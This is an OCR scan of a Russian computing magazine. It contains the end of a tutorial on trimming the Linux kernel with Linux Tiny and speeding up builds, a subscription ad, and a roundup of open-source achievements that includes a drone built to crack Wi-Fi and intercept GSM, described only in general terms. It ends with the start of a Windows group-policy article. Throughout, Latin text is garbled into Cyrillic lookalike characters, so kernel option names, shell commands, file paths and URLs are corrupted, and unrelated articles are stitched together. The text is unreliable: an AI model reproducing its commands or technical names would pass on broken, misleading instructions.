• кехес, позволяющий оперативно переключиться в другое ядро 
(кехес зузіет саІІ, ВиіІсІ а геІосаІаЫе кегпеі, отключение по- 
следней опции делает ядро на 10% меньше); 

• отладочные дампы ядра (кегпеі сгазЬ сіитрз); 

• горячую замену процессоров (Биррогі Іюг ЬоІ-рІиддаЫе СРІІз). 

Следующая секция — «Роѵѵег тападетепі апсі АСРІ орііопз». 
Здесь все более или менее ясно: две важных подсекции — АСРІ, 
СРІІ Ргециепсу зсаііпд (автоматическое изменение частоты работы 
процессора), а также несколько опций, с помощью которых можно 
выкинуть из ядра поддержку различных режимов засыпания 
(БизрепсІ Іо РАМ апсі зІапсІЬу, НіЬегпаІіоп (ака ’зизрепсі Іо сПзк')). 
Если нужно — оставляем, не нужно — выбрасываем, однако сле- 
дуетучесть, что без АСРІ современные системы работают довольно 
убого и могут просто не найти оборудование. С другой стороны, для 
устаревших систем класса Репііит 1 - Репііит 2 можно отключить 
вообще всю секцию энергосбережения, так как тогда еще никаких 
методов сбережения энергии фактически не было. 

Теперь секция «Виз орііопз», в которой можно отключить под- 
держку тех или иных типов шин. Поддержку І5А из ядра наконец- 
то выпилили, поэтому теперь здесь есть выбор из трех шин: РСІ, 

РСІ Ехргезз и РССагсІ. На старой машине и встраиваемой системе 
оставляем только первую, на новой — первую и вторую, на ноуте — 
вторую и третью. 

Далее идет секция «ЕхесиІаЫе Іііе іюгтаіз / Етиіаііопз», в ней 
можно выбрать форматы исполняемых файлов, которые будет 
поддерживать ядро. Могу с уверенностью сказать, что в любой 
системе понадобится отметить только две опции: Кегпеі зиррогі Іюг 
ЕІ_Р Ьіпагіез и ІА32 Етиіаііоп. Без первой ядро не сможет загрузить 
софт, без второй — грузить софт для 32-битного ядра на 64-битной 
системе. Остальное для извращений и отладки. 

Следующая секция — «ІМеІѵѵогкіпд зиррогі», то есть поддержка 
сети. Здесь несколько подсекций и куча опций, для рассказа про 
которые понадобилась бы целая статья. Поэтому ограничимся только 
базовыми опциями. Первое, что следует отключить, — это бранд- 
мауэр (ІМеІѵѵогк раскеі ІіІІегіпд Ігатеѵѵогк (ІЧеІйІІег)), который на 
домашней системе или встраиваемом оборудовании не нужен (если 
только это не маршрутизатор или другой сетевой девайс). Еще мень- 



НИ В КОЕМ СЛУЧАЕ НЕЛЬЗЯ 
ОТКЛЮЧАТЬ ПОДДЕРЖКУ 
5С5І, В СОВРЕМЕННЫХ 
ЯДРАХ С ЕГО ПОМОЩЬЮ 
ЭМУЛИРУЕТСЯ ПРОТОКОЛ АТА 

ше нужен СіоБ апсі/ог Іаіг циеиеіпд. Также отключаем Атаіеиг Расііо 
зиррогі и ѴѴігеІезз. Первое не нужно никому, второе — только если 
система должна поддерживать ѴѴі-Рі. Также можно было бы провести 
небольшой тюнинг параметров ТСР/ІР в секции «ІМеІѵѵогкіпд орііопз», 
однако сэкономить удастся копейки, а возни — на полчаса. Тем более 
что в ядре Ыпих Тіпу все лишнее и так отключено. 

На очереди у нас «йеѵісе йгіѵегз» — самая большая секция, но в то 
же время наиболее простая для понимания и не требующая особых 
разъяснений. Секция содержит множество подсекций для различных 
типов драйверов, начиная отустройств ввода и заканчивая раз- 
личным специализированным оборудованием, о которым ты даже не 
слышал. Главная задача здесь: включить в ядро только драйверы для 
тех устройств, которые реально есть в системе, и выкинуть все, что не 
нужно (например, драйвер инфракрасного порта ІгйА, который может 
и присутствовать в системе, но никому особо не нужен). 

При выборе опций в этой секции обрати внимание на сле- 
дующие нюансы. Во-первых, ни в коем случае нельзя отключать 
поддержку 5С5І, в современных ядрах с его помощью эмулируется 
протокол АТА, поэтому если нет 5С5І — нет дисковой подсистемы. 
Во-вторых, секцию «ІМеІѵѵогк сіеѵісе зиррогі» можно отключать 
полностью, это просто сборник сетевых компонентов вроде ядер- 
ной реализации РРР или РООІ, которые не вошли в другие секции. 
В-третьих, поддержку фреймбуфера (Биррогі Іюг Ігате ЬиІТег 
сіеѵісез) также можно спокойно отключить, все, что потеряешь, — 
консоль высокого разрешения. 

Теперь файловые системы — Рііе зузіетз. Здесь можно отклю- 
чить вообще все, кроме поддержки ехіЗ (ЕхіЗ щигпаіііпд Іііе зузіет 
зиррогі), РАТ (МБйОБ Із зиррогі и ѴРАТ (ѴѴіпсіоѵѵ5-95) Із зиррогі) 
и 150 9660 (150 9660 СОРОМ Іііе зузіет зиррогі). Можно выкинуть 
даже псевдоФС /ргос (/ргос Іііе зузіет зиррогі), хотя без нее не 
будут работать команды типа рз и Іор. Следующую секцию «Кегпеі 
наскіпд» можно отключить полностью, оставив только опцию Мадіс 
БузРд кеу для экстренной перезагрузки. 



Те*1:з сп І_іпш 2 6 29. йл а тіпіліаІійЕіс Ьис *агЬіпд хйб кет^і 




Пт, -272 КѲ м 7%). Сотрг«$е^ КѲ {-2Ѵ%) 



- ПдкаШи- Гог II» ЪегпеІ ЫоСк. Іл^ег 
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Выигрыш от применения патчей ЫпихТту 



Читая МакеЕМе, легко определить, какой опцией активируется сборка объектного файла 
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ІЖІХОГО 



СБОРКА ЯДРА И ОЦЕНКА ВЫИГРЫША 



Теперь можно сохранить конфиг и собрать ядро стандартным 
способом: 



$ 51ІСІО -5 

# таке сіеап 

# таке аіі 

# таке тосіиіезіпзі іаіі 

# есбо у | таке іпзіі аі і 

Перед выполнением последней команды размеры текущего 
и собранного ядра можно сравнить: 

# 1з -ІИ агсИ/х8б/Ьоо1:/Ь2Ітаде /ЬосгЕ/ѵтІіпиг* 

Также после окончания сборки можно легко выяснить, какие 
из подсистем ядра оказались наиболее весомыми. Во время сбор- 
ки код каждой из них объединяется в объектный файл с именем 
ЬиіІЫп.о и помещается в соответствующий раздел: іпіі, изег, 
кегпеі, тт, 1з, ірс, зесигііу, сгуріо, Ыоск, Іи, сігіѵегз, зоипсі, пеі 
и ІіЬ. С помощью команды зіге можно узнать, какие из них оказа- 
лись наиболее крупными: 

# зІ2е *1/Ьиі11:-іп .о | зогі: -п -г -к 4 

Наиболее важные в выводе этой команды первые два столб- 
ца. Первый отражает общий размер кода подсистемы, второй — 
размер данных (в основном это строки и различные константы). 
Следует учитывать, что эти размеры не являются окончательными. 
Многие структуры ядра инициализируются уже после загрузки, 
поэтому в оперативной памяти ядро будет занимать больше места, 
чем показываетутилита зіге. 

Кроме общего размера всей подсистемы, можно также вы- 
яснить и размер отдельных ее компонентов. Для этого достаточно 
перейти в нужный каталог и оценить размер всех объектных фай- 
лов. Чтобы понять, какой опцией ядра регулируется сборка того 
или иного файла (компонента), можно просмотреть файл Макеіііе. 
Он содержит строки примерно такого вида: 

оЬі-$(СОІМРІ6 І05СНЕР СРСП += сГд-іозсІіесІ . о 




Выигрыш от применения тех или иных опций 

Это значит, что сборка файла сіщ-іозсЬесі.о (и включение его 
в ядро) контролируется опцией СОЫ РІ 6 І05СН ЕО СРО. Имя этой 
опции в таком формате всегда указано в описании опции в интер- 
фейсе конфигурирования (таке теписопПд). 

Также в исходниках ядра І_іпих Тіпу есть специальная утилита 
для сравнения выигрыша от отключения определенных опций 
между двумя ядрами. Использовать ее следует так: 

$ ./зсгір1=5/Ыоа1=-о-те1=еп старое-ядро новое-ядро 

На экране появится таблица, в которой будет указано, насколь- 
ко потолстела или похудела каждая внутренняя функция ядра. 



Івыводы 



Используя наработки проекта І_іпих Тіпу, а также гибкий интерфейс 
конфигурирования ядра, вполне можно добиться уменьшения Тук- 
са до 1 Мб и заставить его работать даже на самых доисторических 
и низкопроизводительных системах с несколькими мегабайтами 
памяти. Сборка без поддержки модулей и включения всехдрай- 
веров в ядро также принесет преимущества в виде более быстрой 
загрузки и почти 100%-й защиты от ядерных руткитов. ш 



УСКОРЯЕМ ПРОЦЕСС СБОРКИ ЯДРА 



Во время экспериментов над уменьшением размеров ядра 
тебе наверняка придется проделать не одну повторную 
сборку исходников, так что лучше сразу позаботиться 
о том, чтобы ускорить этот процесс. Наиболее простой 
и универсальный способ сделать это заключается 
в использовании инструмента ссасбе, который закеширует 
промежуточные результаты компиляции так, что вторая, 
третья и последующие сборки ядра будут происходить 
на порядок быстрее. В большинстве систем для 
задействования ссасбе потребуется лишь установить 
одноименный пакет и производить сборку с помощью 
стандартных команд, все остальное система сделает сама 
(если же ссасЬе не будет задействован автоматически, 
достаточно выполнить команду ехрогі СС=/изг/ІіЬ/ссасИе/дсс 
перед сборкой). 

Также, если система оснащена достаточным количеством 
оперативной памяти (2 Гб и больше), стоит задействовать 
дсс-флаг ’-ріре', который заставит компилятор выполнять 
все шаги сборки без создания промежуточных файлов. 



Еще один полезный флаг — это число_ядер‘, который 
позволяет распараллелить процесс сборки между 
несколькими ядрами. Чтобы задействовать эти флаги, 
выполни команду ехрогі СРІ_А65='-ріре -\ 4‘ перед сборкой. 

Если же в твоем распоряжении есть несколько машин, 
то процесс сборки можно распараллелить между ними, 
используя инструмент сіізісс. Для этого достаточно 
установить пакет сіізісс на каждую машину и запустить 
демон: 

$ зисіо /еі: с/ іп іі: . сі/сіізіісссі 5І:аг1: 

Затем, перед началом сборки, указать сіізісс-хосты 
в переменной РІ5ТСС_Н05Т5, а переменной СС присвоить 
значение сіізісс: 

$ ехрогі: 0І5ТСС = Н05Т5="1оса1боз1: 192.168.0.1 Л 

192.168.0.2 м 
$ ехрогі: СС= 'сі ізіісс ' 



ІШП 

Для оптимизации 
сборки по размеру 
необходимо 
предварить все 
команды таке 
следующей строкой: 
СС=§сс СРІ_АС5="-05" 



аоо.д|/26иѵи 

— таблица 
с информацией 
о влиянии тех или 
иных опций сборки 
на размер ядра. 
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Подписка 



ГОДОВАЯ 
ЭКОНОМИЯ 

500 руб 



1. Разборчиво заполни подписной купон и кви- 
танцию, вырезав их из журнала, сделав ксе- 
рокопию или распечатав с сайта зЬор.дІс.ги . 

2. Оплати подписку через любой банк. 

3. Вышли в редакцию копию подписных доку- 
ментов — купона и квитанции — любым из 
нижеперечисленных способов: 

• на е-таіі: зиЬзсгіЬеОдІс.ги; 

• по факсу: (495) 545-09-06; 

• почтой по адресу: 1 15280, Москва, 

ул. Ленинская Слобода, 19, Омега плаза, 

5 эт., офис № 21, 

ООО «Гейм Лэнд», отдел подписки. 

ВНИМАНИЕ! ЕСЛИ ПРОИЗВЕСТИ 
ОПЛАТУ В СЕНТЯБРЕ, ТО ПОДПИСКУ 
МОЖНО ОФОРМИТЬ С НОЯБРЯ. 



12 НОМЕРОВ — 2200 РУБ. 

6 НОМЕРОВ — 1260 РУБ. 

УЗНАЙ, КАК САМОСТОЯТЕЛЬНО ПОЛУЧИТЬ 
ЖУРНАЛ НАМНОГО ДЕШЕВЛЕ! 




ПРИ ПОДПИСКЕ 
НА КОМПЛЕКТ ЖУРНАЛОВ 

ЖЕЛЕЗО + ХАКЕР + 2 ОѴО: — 

ОДИН НОМЕР ВСЕГО ЗА 162 РУБЛЯ 
(НА 35% ДЕШЕВЛЕ, ЧЕМ В РОЗНИЦУ) 



ЗА 12 МЕСЯЦЕВ 3890 РУБЛЕЙ (24 НОМЕРА) 
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САМЫЕ ЯРКИЕ, ИНТЕРЕСНЫЕ 
И ПРОТИВОРЕЧИВЫЕ ДОСТИЖЕНИЯ 
СООБЩЕСТВА СПО ЗА ПОСЛЕДНЕЕ ВРЕМЯ 



Сегодня свободный софт 
можно встретить повсюду: 
в настольных ПК, смартфонах, 
автомобилях, суперкомпьютерах 
и вычислительных системах 
космических кораблей. 

С каждым днем сфера его 
применения все больше 
расширяется, и на этом пути 
порой появляются изумительно 
интересные достижения, 
о которых рассказывают 
друзьям, ретвитят и ставят по 
тысяче «лайков». 



САМЫЙ БЫСТРЫЙ «ИНДИАН» 



В ноябре прошлого года был опубликован 
очередной рейтинг самых быстрых суперком- 
пьютеров мира. Первое место среди них вновь 
занял К Сотриіег, созданный специалистами 
компании Рщіізіі и размещенный в Институте 
физико-химических исследований города Кобе, 
Япония. Этот гигант, состоящий из 705 024 
процессорных ядер 5РАРС64, имеет пиковую 
производительность в районе 10,5 петафлопс 
— абсолютный рекорд среди всех вычисли- 
тельных систем. К Сотриіег оставил далеко 
позади двух своих ближайших конкурентов: 
китайского ТіапГіе-1 А с производительностью 
2,57 петафлопс и Сгау ХТ5 <Оадиаг» с произ- 
водительностью 1,75 петафлопс. Как и 90% 
других суперкомпьютерных систем рейтинга, 

К Сотриіег работает под управлением І_іпих, 
приложения для которого создаются с помощью 
модифицированной закрытой версии Ореп МРІ 
[ ѵѵѵѵѵѵ.ореп-трі.с ). В качестве файловой си- 



стемы используется распределенная ФС І_и5Іге. 
Общая производительность этого зверя боль- 
ше, чем производительность одного миллиона 
современных настольных ПК, а потребляемой 
им энергии хватило бы для освещения десяти 
тысяч домов (9,8 МВт). 

При всем этом Рщіізи уже разработала убий- 
цу К Сотриіег РгітеНРС РХ10, производитель- 
ность которого в два с половиной раза больше, 
чем у предшественника. Для его размещения 
используется 1024 стойки с 98 304 вычисли- 
тельными узлами, каждый из них содержит 
16-ядерный процессор 5РАПС64 Шх с тактовой 
частотой 1,85 ГГц, а также 32 или 64 Гб памяти. 
Каждая такая стойка обойдется покупателю 
в 640 тысяч долларов, а весь суперкомпьютер 
будет стоить примерно 660 миллионов. Так что 
если у тебя есть знакомый олигарх, можешь 
смело советовать ему приобрести это чудо 
в качестве очередной игрушки. Место в Книге 
рекордов Гиннесса обеспечено. 
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Назло рекордам 





Так выглядит самый медленный комп под управлением Ыпих 



ИГРУШЕЧНЫЙ КЛАСТЕР 



Может быть, для японских исследователей 
приобретение компьютерной системы за не- 
сколько сотен миллионов — это обычное дело, 
но американские военные явно не согласны 
расставаться с таким количеством денег. 

Иначе зачем им строить суперкомпьютер из 
игровых приставок? 

Да, именно это сделала исследовательская 
лаборатория Военно-воздушных сил США. 

По примеру энтузиастов, строящих домаш- 
ние кластеры из десятка игровых приставок, 
они закупились комплектом из 1760 приста- 
вок РІауЗіаІіоп 3 и создали самый мощный 
в Министерстве обороны США интерактивный 
суперкомпьютер, производительность которого 
оказалась настолько высока, что его можно 
поставить примерно на 12-е место в рейтинге 
ТорбОО (около 500 терафлопс). При этом его 
создание обошлось министерству «всего» в два 
миллиона долларов — это в 10-20 раз дешевле 
аналогичных решений, построенных с использо- 
ванием классических серверов. 

Большую часть времени кластер использу- 
ется для обработки разного рода графической 
информации, такой как снимки со спутников, 
анализ данных радаров, распознавание объ- 
ектов и так далее. Все это делается с помо- 
щью Ыпих и 84 вспомогательных серверов, 
обеспечивающих координацию работы узлов 
кластера. Причем военным пришлось как-то до- 
говариваться с компанией 5опу, которая запре- 
тила установку сторонних ОС на свою игровую 
приставку именно в тот момент, когда сборка 
кластера была в самом разгаре. Поэтому всем, 
кто захочетустановить Ыпих на свою Р53, я бы 
порекомендовал начать с создания кластера — 
так 5опу быстрее пойдет на уступки. 



САМЫЙ МЕДЛЕННЫЙ КОМПЬЮТЕР 
ПОД УПРАВЛЕНИЕМ ІЛМІІХ—І 



Зачем ставить рекорды производительности, 
если можно поставить рекорд медлитель- 
ности? Похоже, именно этот вопрос вертелся 
в голове у Дмитрия Гринберга, когда он вына- 
шивал планы по портированию ІІЬипШ Ыпих 
на 8-битный микроконтроллер с объемом опе- 
ративной памяти 256 Кб. Как же он это сделал, 
когда Ыпих требует как минимум 32-битный 
процессор с модулем ММІІ и 1 Мб памяти, 
чтобы вместить ядро? 

Чтобы обойти ограничение в количестве 
оперативной памяти, он подключил к микро- 



контроллеру АТтеда1284р модуль 5ІММ-памяти 
на 16 Мб, для которого написал полноценный 
программный контроллер, позволяющий до- 
стичь скорости записи аж в 300 Кб/с, что уже 
является своеобразным антирекордом. Далее 
понадобилось место для хранения операци- 
онной системы, в этом качестве была исполь- 
зована 50-карта объемом 1 Гб, для которой 
Дмитрий точно также написал программный 
5РІ-контроллер, обеспечивающий скорость 
записи 200 Кб/с. 

Наконец, чтобы достичь недостижимого, 
а именно запуска Ыпих на 8-битном процес- 
соре, Дмитрий применил самый хитрый трюк: 
он написал эмулятор 32-битной процессорной 
архитектуры АРМѵбТЕ, способный работать на 
убогом 8-битном процессоре микроконтролле- 
ра. Причем написал его, применив несколько 
техник оптимизации, в том числе кеширование 
процессорных инструкций с использованием 
встроенной памяти микроконтроллера. Резуль- 
тирующая производительность виртуального 
процессора получалась в районе 6,5 кГц, что 
является абсолютным антирекордом среди 
самых медленных систем, способных запускать 
Ыпих. Скорость загрузки Ыпих на этом чуде 
инженерной мысли также оказалась рекорд- 
ной: ІІЬипІи 9.04 загрузилась до приглашения 
к вводу пароля в консоли за шесть часов, а до 
приглашения ЬазИ без загрузки всех сервисов 
(іпіІ=/Ьіп/Ьа5Ы — за четыре часа. Для выполне- 
ния же консольных команд, вроде вывода ли- 
стинга файлов на экран, система тратила около 
минуты, что позволило Дмитрию насладиться 
работой в консоли по всем традициям практик 
дзен-буддизма. 



ГОТОВЫЙ К РАБОТЕ ШІІХ 
ЗА СЕКУНДУ 



От антирекордов к наивысшим успехам. Там, 
где у одних загрузка Ыпих занимает шесть 
часов, другие получают готовую к работе ОС за 



одну секунду. Такой рекордной скорости за- 
грузки пингвина удалось добиться инженерам 
компании ТесЬ поіодіс Зузіетз на своем одно- 
платном АРМ-компьютере Т5-7400. Фактиче- 
ски это значит, что компьютер готов к работе 
сразу после включения. Это быстрее, чем 
выход из сна Ыпих-системы на ноутбуке. Это 
быстрее, чем ты скажешь слово «быстро». 

Но обо всем по порядку. Чтобы добиться 
такой скорости загрузки, программисты ис- 
пользовали технологию, названную внутри 
компании Т5-ПА5НВ00Т. Смысл ее заклю- 
чается в том, чтобы использовать постоянную 
МАИБ-память как часть оперативной памяти. 
Другими словами, Т5-ПА5НВ00Т не загру- 
жает Ыпих в прямом смысле слова, а просто 
запускает на исполнение код расположенной 
в памяти постоянной. При этом код записы- 
вается в память с уже инициализированными 
структурами ядра и приложений, поэтому все, 
что остается сделать ядру и сервисам после 
включения питания, — инициализировать же- 
лезо (для чего также используются некоторые 
оптимизации), и система готова к работе. 

Для тех, кто не считает это рекордом 
и хочет показать примеры такой же скоро- 
сти загрузки на других системах, приведу 
характеристики Т5-7400: процессор АРМ9, 
работающий на частоте 200 МГц, 32 Мб опера- 
тивной памяти и 32 Мб ПЗУ, это эквивалентно 
домашним машинам на процессоре Репіішті 1 
примерно 1995 года выпуска. 



БРАУЗЕРНЫЙ ВИРТУАЛЬНЫЙ КОМП 



Если возможность запуска Ыпих на 8-битном 
микроконтроллере и загрузка за одну секун- 
ду тебя не впечатлили, тогда что ты скажешь 
о виртуальной Ыпих-машине, работающей вну- 
три браузера? Нет, не с использованием техно- 
логий Ыаііѵе СІіепІ или ѴІЧС, а с использованием 
стандартных НТМІ_ и ЭаѵаЗсгірІ, которые есть, 
скажем, в ІЕ6. Бред? Возможно, но он реален. 



ДМИТРИЙ НАПИСАЛ ЭМУЛЯТОР 32-БИТНОЙ 
ПРОЦЕССОРНОЙ АРХИТЕКТУРЫ АКМѴ5ТЕ, 
СПОСОБНЫЙ РАБОТАТЬ НА УБОГОМ 
8-БИТНОМ ПРОЦЕССОРЕ 
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ІЖІХОГО 




Тестируем эмулятор ПК на ^ѵаБсгірІ 

Французский математик Фабрис Бел- 
лар, получивший известность за создание 
эмулятора ПК (ЗЕМІІ, библиотеки обработки 
мультимедийных данных РРтред и самого 
быстрого алгоритма вычисления числа Пи, 
написал новую виртуальную машину, в этот раз 
на чистом ЗаѵаБсгірІ. Специализированный 
Ыпих-дистрибутив, специально подготовлен- 
ный Белларом, загружается в этом эмуляторе 
за две секунды, а для использования доступны 
стандартные команды работы с ТСР/ІР-стеком, 
текстовые редакторы ОЕтасз и V і, различные 
серверы вроде РТРсІ, зепсітаіі и НТТРсІ. 

Эмулятор реализует эмуляцию процессора 
І486, контроллер прерываний 8259, таймер 
8254 и приемопередатчик 1650 ІІАРТ, а также 
сетевую карту, виртуальный дисплей и АТ- 
клавиатуру. Из недостатков можно отметить 
разве что отсутствие блока вычислений 
с плавающей точкой (РР11), а также набора 
инструкций ММХ и 55Е, что нисколько не 
мешает запуску и прекрасной, быстрой работе 
консольного Ыпих-дистрибутива. 

Работа сделана по всем законам <Оіі5І Іог 
Іип», никакого профита, никаких субсидий 
или задела на будущее. Мотивом к написа- 
нию эмулятора стал интерес к современным 
ЗаѵаБсгірІ-движкам и их способности эффек- 
тивно выполнять тяжелые вычислительные 
задачи. При этом оказалось, что скорость 
работы эмулятора внутри Рігеіох в два раза 
выше, чем в СЬготе, что, по словам самого 
Беллара, можно объяснить простым отсут- 
ствием оптимизаций, так как движок Заедег 
Мопкеу из Рігеіох он изучил гораздо лучше. 

Увидеть это чудо в действии можно на до- 
машней странице автора: ЬеІІагсІ.огд/]5Ііпих . 



II N IX НА КАЛЬКУЛЯТОРЕ 



От машин виртуальных к машинам реаль- 
ным. Что бы ты сказал о возможности запуска 
ІІІЧІХ на программируемом калькуляторе? Идея 
настолько же спорная, насколько и реальная. 

В рамках проекта Рипіх ( рипіх-оз.ЫодзроІ.сот ) 
уже давно трудятся над созданием ІЭ N IX- 
подобной ОС для калькуляторов ТІ-92+, однако 
совсем недавно разработчики сделали важ- 
ный шаг вперед — запустили ОС на реальном 
калькуляторе. 

Что это дало? Абсолютно ничего, кроме 
морального удовлетворения. Операционная 




Пример спецификации для инструмента Тегтііе 

система была написана с нуля, начиная от 
реализации ядра с вытесняющей многоза- 
дачностью и заканчивая набором команд 
пространства пользователя и возможно- 
стью соединения с другим калькулятором 
и настольным ПК. Все это реализовано на 
машинке размером 240x128 с монохромным 
дисплеем, 256 Кб ОЗУ, 2 Мб ПЗУ и процессо- 
ром Моіогоіа 68000, работающим на частоте 
12 МГц. 

Если в твоем распоряжении вдруг оказался 
такой калькулятор, то вперед, теперь ты мо- 
жешь превратить его в настоящий карманный 
ПК и запросто уделаешь своей оригинально- 
стью всех владельцев іРГіопе. 



ШПИОНСКИЙ БЕСПИЛОТНИК 



Американские военные и полицейские уже 
давно облюбовали такие игрушки, как беспи- 
лотные летательные аппараты, которые могут 
пролететь над местностью и сделать снимки 
расположения противников, преступников 
и гражданских лиц. Двое бывших сотрудни- 
ков армии США решили, что это слишком про- 
стая задача для таких устройств, и сделали 
из бывшего планера настоящий беспилот- 
ный разведчик, способный без какого-либо 
управления со стороны человека летать над 
местностью и собирать данные о ѴѴі-Рі-сетях, 
взламывать их защиту и даже перехватывать 
СБМ-сигнал. МайкТэсси и Ричард Перкинс 
представили свою разработку под названием 
ѴѴА5Р (ѴѴігеІевз АегіаІ 5и гѵеіііапсе РІаІІогт) 
на конференции БЕЕ СОЫ 18, прошедшей 
в 2010 году. Их летательный аппарат был 
создан на базе военного планера, которому 
подрезали крылья, установили мотор, а так- 
же разместили на борту компьютер ѴІА ЕРІА 
Рісо-ІТХ под управлением ВаскТгаск І_іпих 
и РШ-камеру для контроля взлета и посадки. 
После взлета самолет мог самостоятельно 
кружить над указанной местностью, опреде- 
ляемой с помощью СРБ-модуля, и взламы- 
вать ѴѴі- Рі-сети. 

В 2011 году на конференцию йЕР СОЫ 19 
экс-военные привезли модифицированную 
версию ѴѴА5Р. Теперь она была оснащена 
65М-модулем, с помощью которого можно 
перенести задачи расчетов, например перебор 
паролей, на удаленную машину, а также, как 
это ни странно, перехватить 65М-сигнал по- 




ІІШХ на калькуляторе 

средством эмуляции базовой станции (причем 
как это сделать, создатели ѴѴА5Р узнали на 
прошлой конференции). 

Игрушка имеет массу всего 6 килограммов, 
размах крыльев в 2 метра, длину 1,7 метра 
и способна набирать высоту аж до 6,7 километра 
при общем времени полета 30-45 минут. Если ты 
хочешь такую же, то можешь легко собрать ее 
из подручных материалов, воспользовавшись 
инструкцией, опубликованной на официальном 
сайте: ЬіІр5://гаЬЬіІ-Ьо1е.огд/І"іоѵѵ-Іо . 



ДРАЙВЕРЫ, КОТОРЫЕ 
ПИШУТ САМИ СЕБЯ ■ 



Лень — двигатель прогресса. Это утверждение 
как нельзя лучше подходит для описания тех- 
нологии Тегтііе, разработанной под руковод- 
ством сотрудника Іпіеі І_аЬз Аруна Рагхуната. 
Тегтііе представляет собой инструмент 
автоматического генерирования драйверов 
для любого оборудования; чтобы он работал, 
не требуется ничего, кроме спецификаций 
устройства и подсистемы драйверов операци- 
онной системы. 

Алгоритм работы Тегтіі основан на методах 
теории игр и представляетустройство и опера- 
ционную систему в виде двух игроков, которые 
по очереди делают ходы, в результате чего 
изменяют состояние друг друга. Задача Тегтііе 
состоит в том, чтобы попробовать все воз- 
можные варианты ходов и выработать такой 
алгоритм игры обеих сторон, при котором ни 
устройство, ни операционная система никогда 
не окажутся в противоречивом состоянии. 
Выигрышные комбинации ходов запомина- 
ются, и на основе этих данных генерируется 
драйвер. 

Интересно, что это не просто очередная 
теоретическая технология, а настоящий рабо- 
тающий код, который был успешно применен 
для генерации для контроллера Бй-карт РісоЬ 
Р5С822 и адаптера ІІБВ-ЕіЬегпеІ А5ІХ АХ88772 
для операционных систем І_іпих и РгееВБО. 



ІІВІІМТУ НА СМАРТФОНЕ 



Времена, которых ждут уже как минимум 
последние лет пять, наконец-то приходят. 
Долой громоздкие домашние ПК, долой 
ноутбуки и планшеты, долой все, что нельзя 
взять с собой. Будущее за портативной тех- 
никой, за мобильными телефонами, которые 
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ты сможешь носить с собой везде и которые 
легко превратить в полноценную рабочую 
станцию, просто подключив монитор, кла- 
виатуру и мышь. 

Проект ІІЬипІи Іюг АпсІгоісІ ставит своей 
целью создать такое будущее здесь и сейчас. 
Смысл разработки в том, чтобы разместить на 
50-карте смартфона образ с операционной 
системой ІІЬипІи, которая получит управление, 
когда к телефону будут подключены монитор 
и клавиатура. Идея, надо сказать, не новая и в 
том или ином виде уже реализована другими 
компаниями и энтузиастами. Однако благодаря 
известности бренда ІІЬипІи, а также высокому 
качеству реализации идеи СапопісаІ вполне 
способна в ближайшем будущем стать лидером 
на этом рынке. 

ІІЬипІи Іюг АпсІгоісІ имеет несколько серьез- 
ных преимуществ. Во-первых, ОС работает 
в качестве дополнительной операционной си- 
стемы на втором процессорном ядре смартфо- 
на. Это значит, что АпсІгоісІ и ІІЬипІи способны 
сосуществовать в одно и то же время, после 
запуска ІІЬипІи АпсІгоісІ на смартфоне этого 
даже не заметит и все твои приложения будут 
продолжать функционировать, принимая звон- 
ки, СМС и письма. Во-вторых, ІІЬипІи глубоко 
интегрируется с АпсІгоісІ и позволяет получить 
доступ к адресной книге, закладкам, кален- 
дарю и прочему. Если на телефон придет СМС, 
уведомление об этом появится на рабочем 
столе и ты сможешь отправить ответ, таким же 
образом можно отвечать на звонки и выпол- 
нять массу другой работы. 

Пока ІІЬипІи І"ог АпсІгоісІ лишь прототип, но 
волне работоспособный. Впервые Марк Шат- 
тлворт рассказал о нем в своем блоге в февра- 
ле 2012 года, а работа продукта на реальном 
железе была продемонстрирована уже через 
неделю на выставке ѴѴМС 2012. 



КАК СЭКОНОМИТЬ ЧЕТЫРЕ ■ 
МИЛЛИОНА ЕВРО НАШИХ? 



Долгое время МісгозоЙ спекулировала на 
идее о том, что переход на І_іпих не может 
дать экономии, так как, несмотря на бес- 
платность самих Ыпих-дистрибутивов, на их 
сопровождение, а также обучение персона- 



ла придется потратить денег больше, чем 
при покупке лицензии на ѴѴіпсІоѵѵз. Многие 
компании всерьез верили в эти слова и даже 
проводили собственные исследования, 
которые подтверждали выводы МісгозоІЧ. Но 
власти Германии не из их числа: они не стали 
проводить исследования, выполнять тесто- 
вые установки 1_іпих в избранных заведениях, 
а разом перевели большое количество госуч- 
реждений Мюнхена на І_іпих, получив в итоге 
не только экономию, но и положительные 
отзывы пользователей. 

Всего в рамках этого проекта на І_іпих 
было переведено около девяти тысяч машин. 
В результате экономия на покупке лицензий 
на ѴѴіпсІоѵѵз составила 4 миллиона евро, 

2,8 миллиона евро было сэкономлено на при- 
обретении коммерческого ПО, 1,2 миллиона — 



на обновлении оборудования, которое не соот- 
ветствовало требованиям ѴѴіпсІоѵѵз 7. Однако 
самый интересный вывод властей состоит в том, 
что количество обращений, связанных с про- 
блемами в работе ПО, не просто не увеличилось 
— оно существенно сократилось: с 70 до 46 
в месяц. 



ЧТО ДАЛЬШЕ? 



Не знаю, сколько еще интересных открытий 
и достижений принесет нам СПО в будущем, 
но можно с определенностью утверждать, 
что модель разработки, во многом основан- 
ная на принципе «Эизі Іюг Іюп», приносит 
отличные результаты. Как и другие откры- 
тия, открытия в области ПО зачастую носят 
случайный характер и происходят во время 
экспериментов. ЛС 




ІІЬипІи Тог АпсІгоісІ в действии 




ѵѵѵѵѵѵ.ѵоиІиЬе.сот/ 

ѵѵаІсН?ѵ=АсІгЦрт5ѵ 

М2А— демонстрация 
полета ѴѴА5Р. 




Интересно, 
что в 2000 году 
Министерство 
обороны США, 
в руках которого 
находится кластер 
из РІауБІаІіопЗ, 
высмеивало Ирак 
за их планы по 
созданию кластера 
из приставок РІау- 
Біаііоп 2. 
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Сергей «дгіпсіег» Яремчук (дгіпсіегйзупаск.ги) 




По единым 

правилам 




КОНТРОЛЬ 

ИСПОЛЬЗОВАНИЯ 

ВНЕШНИХ УСТРОЙСТВ 

ШТАТНЫМИ 

СРЕДСТВАМИ 

ЖШ00Ж5 

Повысить защищенность сети существенно 
помогают групповые политики, 
обеспечивающие централизованное 
управление настройками и политиками 
безопасности серверов и рабочих станций. С 
выходом ѴѴіп7/2к8 администраторы получили 
ряд дополнительных параметров 6Р0, которые 
позволяют контролировать работу с внешними 
устройствами, снижая риск как заражения 
систем, так и утечки конфиденциальных 
данных. 



УПРАВЛЕНИЕ ГРУППОВЫМИ ПОЛИТИКАМИ 



В ѴѴіпсІоѵѵз для управления конфигурациями компьютеров и пра- 
вами пользователей применяются наборы правил, объединяемые 
в объекты групповых политик (бгоир Роіісу ОЬіесІ, 6Р0), которые 
